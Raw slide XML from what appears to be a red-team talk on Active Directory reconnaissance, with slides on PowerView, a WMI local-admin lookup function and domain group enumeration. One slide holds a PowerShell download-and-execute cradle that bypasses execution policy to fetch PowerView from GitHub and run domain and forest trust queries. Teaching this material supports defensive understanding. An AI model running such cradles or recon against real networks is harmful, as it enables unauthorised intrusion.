              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176935758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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="94736"/>
            <a:ext cx="12109142" cy="1482394"/>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Network Recon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>PowerView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> ~ Chaining commands together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F71CFF19-8733-4DCF-85C1-CB944C763010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="118142" y="1772115"/>
            <a:ext cx="4554525" cy="4616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetForest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetForestTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>NetDomainTrust</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> -exec bypass -c "IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>('https://raw.githubusercontent.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerShellMafia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/master/Recon/PowerView.ps1'); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NetDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NetForest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NetForestTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NetDomainTrust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E05606CD-904D-4AD5-8543-725FDB78CE58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4672668" y="1772114"/>
            <a:ext cx="7401189" cy="4813243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57FDD8DF-3CEE-4B1D-B853-DF3B0E2236AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11182526" y="6306304"/>
            <a:ext cx="891331" cy="25167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Arrow: Left 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{785D76FD-6DF8-4A3A-8B5A-CB13A47F0C1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4920991" y="4513006"/>
            <a:ext cx="6022311" cy="2044968"/>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bg1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Commands chained together after</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149064040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2EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2326988" y="16778"/>
            <a:ext cx="7538024" cy="735774"/>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4000" dirty="0"/>
              <a:t>Powershell Functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AD8872D-711B-46D7-B1A4-1050203C06EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798816" y="1246266"/>
            <a:ext cx="11282266" cy="5478547"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>function get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>localadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> {  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> ($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>strcomputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   $admins = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Gwmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> win32_groupuser –computer $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>strcomputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   $admins = $admins |? {$_.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>groupcomponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> –like '*"Administrators“’}  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   $admins |% {  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   	$_.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>partcomponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> –match “.+Domain\=(.+)\,Name\=(.+)$” &gt; $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   	$matches[1].trim('"') + “\” + $matches[2].trim('"')  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	}  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>								                        *you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>build these out as well</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213621578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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Network Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Groups + Computers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490936" y="1803075"/>
            <a:ext cx="9152468" cy="4555093"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>List all groups in the domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>List privileged groups members </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> Admins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enterprise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> Admins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>List of computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>ID the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>’s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A74C747A-F434-4915-A001-2A0CD8FEC7C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5922499" y="4984571"/>
            <a:ext cx="6098343" cy="1505242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">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t>net group "domain controllers" /domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>net group "domain admins" /domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> "administrators"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263395275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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Network Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>UserHunter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
